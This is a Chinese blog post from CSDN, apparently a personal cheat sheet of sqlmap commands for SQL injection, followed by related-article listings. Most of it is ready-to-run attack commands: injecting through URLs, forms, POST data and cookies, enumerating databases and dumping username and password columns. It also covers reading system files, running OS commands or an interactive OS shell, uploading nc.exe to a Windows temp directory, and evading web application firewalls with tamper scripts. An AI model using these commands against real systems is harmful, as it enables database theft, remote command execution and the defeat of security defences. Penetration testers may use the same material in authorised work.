sql注入之——SQLMap常见语句

最新推荐文章于 2024-06-17 13:37:15 发布
最新推荐文章于 2024-06-17 13:37:15 发布
阅读量3.7k 收藏 10
点赞数 2
分类专栏: web渗透测试与代码审计 #+ SQL注入攻击 #+ 渗透测试工具 文章标签: mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43079958/article/details/107446374
版权

填坑~~

SQLMap常见语句

首先要明确
整个的单词 需要用两个横杠–
缩写的单词 需要一个横杠-

参考:https://www.freebuf.com/sectool/164608.html

一、个人常用语句总结:

1、最常用URL注入语句 sqlmap.py -u http://192.168.0.102/sqlserver/1.aspx?xxser=1

–level=LEVEL 执行测试的等级(1-5,默认为1),使用–level 参数且数值>=2的时候也会检查cookie里面的参数,当>=3的时候将检查User-agent和Referer。

  • -risk=RISK 执行测试的风险(0-3,默认为1),默认是1会测试大部分的测试语句,2会增加基于事件的测试语句,3会增加OR语句的SQL注入测试。

-v VERBOSE信息级别: 0-6 (缺省1),其值具体含义:“0”只显示python错误以及严重的信息;1同时显示基本信息和警告信息(默认);“2”同时显示debug信息;“3”同时显示注入的payload;“4”同时显示HTTP请求;“5”同时显示HTTP响应头;“6”同时显示HTTP响应页面;如果想看到sqlmap发送的测试payload最好的等级就是3。

2、批量注入 sqlmap.py -m oldboy.txt

3、模拟测试手机环境站点 sqlmap.py -u”http://www.oldboyedu.com/vuln.php?id=1” –mobile

4、智能判断测试 sqlmap.py -u “http://www.oldboyedu.com/info.php?id=1“–batch –smart

5、post注入 sqlmap.py -r burpsuite抓包.txt

6、指定参数注入 sqlmap.py -r post.txt -p 注入参数

7、指定表单注入 sqlmap.py -u URL –data“username=a&password=a”

二、sqlmap自动填写表单注入

sqlmap.py -u URL --forms

sqlmap.py -u URL –forms --dbs //默认情况系sqlmap会自动的探测web应用后端的数据库类型:MySQL、Oracle、PostgreSQL、MicrosoftSQL Server、Microsoft Access、SQLite、Firebird、Sybase、SAPMaxDB、DB2

–current-user:大多数数据库中可检测到数据库管理系统当前用户

–current-db:当前连接数据库名

–is-dba:判断当前的用户是否为管理

–users:列出数据库所有所有用户

sqlmap.py -u URL –forms –dbs

sqlmap.py -u URL –forms –current-db

sqlmap.py -u URL –forms -D 数据库名称 –-tables

sqlmap.py -u URL –forms -D 数据库名称 -T 表名 --columns

sqlmap.py -u URL –forms -D 数据库名称 -T 表名 -C username,password --dump

三、sqlmap cookies注入

sqlmap.py -u “http://127.0.0.1/base.PHP“–cookies “ant[uname]=admin″ –dbs --level 2

默认情况下SQLMAP只支持GET/POST参数的注入测试,但是当使用–level 参数且数值>=2的时候也会检查cookie里面的参数,当>=3的时候将检查User-agent和Referer。可以通过burpsuite等工具获取当前的cookie值,然后进行注入:

sqlmap.py -u 注入点URL --cookie “id=xx” --level 3

sqlmap.py -u url --cookie “id=xx”–level 3 --tables(猜表名)

sqlmap.py -u url --cookie “id=xx”–level 3 -T 表名 --coiumns

sqlmap.py -u url --cookie “id=xx”–level 3 -T 表名 -C username,password --dump

四、扩展命令执行

1、sqlmap.py-u “url” --file-read /etc/password

2、sqlmap.py -u “url” --os-cmd="net user” /执行net user命令/

3、sqlmap.py -u “url” --os-shell /系统交互的shell/

4、sqlmap.py -u”http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther“-–file-read “C:/example.exe” -v 1

5、python sqlmap.py -u”http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1” -–file-write "/software/nc.exe” –file-dest “C:/WINDOWS/Temp/nc.exe” -v1 /将/software/nc.exe文件上传到C:/WINDOWS/Temp下/

五、SQLMAP突破Waf

  1. mysql的注释方法进行绕过WAF进行SQL注入
    (1)修改C:\Python27\sqlmap\tamper\halfversionedmorekeywords.py

return match.group().replace(word,”/*!0%s” % word) 为:

return match.group().replace(word,”/!50000%s/” % word)

(2)修改C:\Python27\sqlmap\xml\queries.xml

<cast query=”CAST(%s ASCHAR)”/>为:

<castquery=”convert(%s,CHAR)”/>

(3)使用sqlmap进行注入测试

sqlmap.py -u”http://**.com/detail.php? id=16″ –tamper “halfversionedmorekeywords.py”

其它绕过waf脚本方法:

sqlmap.py-u “http://192.168.136.131/sqlmap/mysql/get_int.php?id=1” –tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3

(4)tamper目录下文件具体含义:

space2comment.py用/**/代替空格

apostrophemask.py用utf8代替引号

equaltolike.pylike代替等号

space2dash.py 绕过过滤‘=’ 替换空格字符(”),(’–‘)后跟一个破折号注释,一个随机字符串和一个新行(’n’)

greatest.py 绕过过滤’>’ ,用GREATEST替换大于号。

space2hash.py空格替换为#号,随机字符串以及换行符

apostrophenullencode.py绕过过滤双引号,替换字符和双引号。

halfversionedmorekeywords.py当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论

space2morehash.py空格替换为 #号 以及更多随机字符串 换行符

appendnullbyte.py在有效负荷结束位置加载零字节字符编码

ifnull2ifisnull.py 绕过对IFNULL过滤,替换类似’IFNULL(A,B)’为’IF(ISNULL(A), B, A)’

space2mssqlblank.py(mssql)空格替换为其它空符号

base64encode.py 用base64编码替换

space2mssqlhash.py 替换空格

modsecurityversioned.py过滤空格,包含完整的查询版本注释

space2mysqlblank.py 空格替换其它空白符号(mysql)

between.py用between替换大于号(>)

space2mysqldash.py替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)

multiplespaces.py围绕SQL关键字添加多个空格

space2plus.py用+替换空格

bluecoat.py代替空格字符后与一个有效的随机空白字符的SQL语句,然后替换=为like

nonrecursivereplacement.py双重查询语句,取代SQL关键字

space2randomblank.py代替空格字符(“”)从一个随机的空白字符可选字符的有效集

sp_password.py追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾

chardoubleencode.py双url编码(不处理以编码的)

unionalltounion.py替换UNION ALLSELECT UNION SELECT

charencode.py url编码

randomcase.py随机大小写

unmagicquotes.py宽字符绕过 GPCaddslashes

randomcomments.py用/**/分割sql关键字

charunicodeencode.py字符串 unicode 编码

securesphere.py追加特制的字符串

versionedmorekeywords.py注释绕过

space2comment.py替换空格字符串(‘‘) 使用注释‘/**/’

halfversionedmorekeywords.py关键字前加注释

温柔小薛
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Sqlmap命令大全
学习、分享、交流
05-26 2万+
Sqlmap:开源的SQL注入漏洞检测的工具,能够检测动态页面中的get/post参数,cookie,http头,还能 够查看数据,文件系统访问,甚至能够操作系统命令执行。
sqlmap常用语句
08-14
sqlmap常用语句sqlmap常用语句
sql注入sqlmap(渡栗的学习笔记)
最新发布
2301_79998006的博客
06-17 1097
sqlmap的使用。Sqlmap是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。目前支持的数据库有MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access等大多数据库。
Sqlmap常用语句
HurryPotter
04-04 570
Sqlmap常用语句: 转自 http://www.75271.com/1228.html 基础信息 pythonsqlmap/sqlmap.py -u “http://url/news?id=1” –current-user #获取当前用户名称 pythonsqlmap/sqlmap.py -u “http://www.xxoo.com/news?id=1” –curr...
sqlmap注入语句整理
神经质的盛宴的专栏
11-29 464
转载:http://www.52harry.com/program/python/2011-11-11/520.html 获取数据库名 ./sqlmap.py -u "http://www.xx.php?nid=14550"  --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0;  .NE
SQLmap常用语句
3569
06-24 608
Sqlmap简介   sqlmap 是一个自动SQL 射入工具。它是可胜任执行一个广泛的数据库管理系统后端指印, 检索遥远的DBMS 数据库, usernames, 桌, 专栏, 列举整个DBMS, 读了系统文件和利用导致SQL 射入弱点的网应用编程的安全漏洞。    sqlmap下载地址:   想要运行sqlmap,必须安装python环境  Python环境安装及配置   Pyt
Web应用手工渗透测试——用SQLMap进行SQL盲注测试
02-26
本文主要关注SQL注入,假设读者已经了解一般的SQL注入技术,在我之前的文章中有过介绍,即通过输入不同的参数,等待服务器的反应,之后通过不同的前缀和后缀(suffixandprefix)注入到数据库。本文将更进一步,讨论SQL...
SQL注入——网络安全问题不容忽视!(五)
04-05
SQL注入是一种常见的网络安全问题,它发生在应用程序不恰当地处理用户输入的数据时,导致数据库查询语句的结构被破坏,从而使攻击者能够执行恶意SQL命令。本文将深入探讨SQL注入的原理、危害、检测方法以及防范策略...
SQL注入大餐必备餐具SQLMA
11-06
SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意SQL语句来操纵后端数据库,进而获取敏感信息或控制数据库。为了有效地进行SQL注入攻击,通常会使用专门的工具来辅助,其中最著名的就是...
sqlmapproject-sqlmap-1.6.7-2-g8c26c67.zip
07-28
本文将深入探讨一款强大的SQL注入自动化工具——Sqlmap,特别是基于版本1.6.7-2-g8c26c67的实现。 Sqlmap是一款开源的渗透测试工具,专为检测和利用SQL注入漏洞而设计。它的功能强大,支持多种数据库管理系统(如...
sqlmap一键安装,解压即用!绿色无忧!
10-14
在这里,我将向你介绍一个无与伦比的工具——SQLMap。你可能已经听说过它,但我要告诉你的是,它比你想象的要强大得多。 SQLMap,就像它的名字所暗示的,是一个为你提供方便的“SQL注入攻击”的工具。对于那些不...
sql注入语句sqlmap常用语句
weixin_45380141的博客
12-01 132
常见Sqlmap语句
安全小站
09-25 2830
Access:  –爆表 sqlmap.py -u http://127.0.0.1/news.asp?id=7″  –table –爆字段 sqlmap.py -u “http://127.0.0.1/news.asp?id=7″ –columns -T admin –爆账号密码 ./sqlmap.py -u “http://127.0.0.1/news.asp?id=7″ –
sqlmap简单中文说明
weixin_34269583的博客
10-09 317
更新 svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 1 --sql-shell //执行SQL语句 sqlmap.py -u...
sqlmap常见注入方式和基本注入语句
qq_58317810的博客
04-30 2925
sqlmap的get注入方式(以sqli_lables靶场题目为例) (--batch:要求所有数据都选取默认值) sqlmap -u "http://192.168.31.56/Less-1/?id=1" --dbs --batch(探测库名) sqlmap -u "http://192.168.31.56/Less-1/?id=1" -D security --tables --batch(探测表名) sqlmap -u "http://192.168.31.56/Less-1/?id=1" -D se
Sqlmap常用渗透测试语句
lizhengnanhua的专栏
09-05 2574
1.获取网站基本信息  sqlmap.py  -u http://.../  2.获取网站的数据库信息 sqlmap.py -u http://../ --dbs 3.获取数据库DataBaseTest下的表Table(假设获取到表admin) sqlmap.py -u http://../ -D DataBaseTes --tables 4.获取表admin的列明  sqlmap.
sqlmap语句
weixin_42728957的博客
12-24 588
将url、cookie放到-u、cookie的参数里 sqlmap.py -u “” //查看应用服务器信息、可进行注入的漏洞类型 sqlmap.py -u “” --cookie="" --dbs --level=2 //查看应用服务器的所有实例 sqlmap.py -u “” --cookie="" --current-db --level=2 //查看当前实例 sqlmap.py...
Sqlmap数据库常用语句总结
qq_43017796的博客
12-23 406
Sqlmap数据库常用语句总结 ./sqlmap.py -u “注入地址” -v 1 --dbs // 列举数据库 ./sqlmap.py -u “注入地址” -v 1 --current-db // 当前数据库 ./sqlmap.py -u “注入地址” -v 1 --users // 列数据库用户 ./sqlmap.py -u “注入地址” -v 1 --current-user...
SQL注入攻击与sqlmap工具详解
SQL注入是一种常见的网络安全漏洞,主要发生在Web应用程序中,当用户输入的数据未经适当验证就直接被用来构造数据库查询时,攻击者可以通过精心构造的输入来执行非预期的SQL命令,从而获取敏感信息、篡改数据,甚至...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值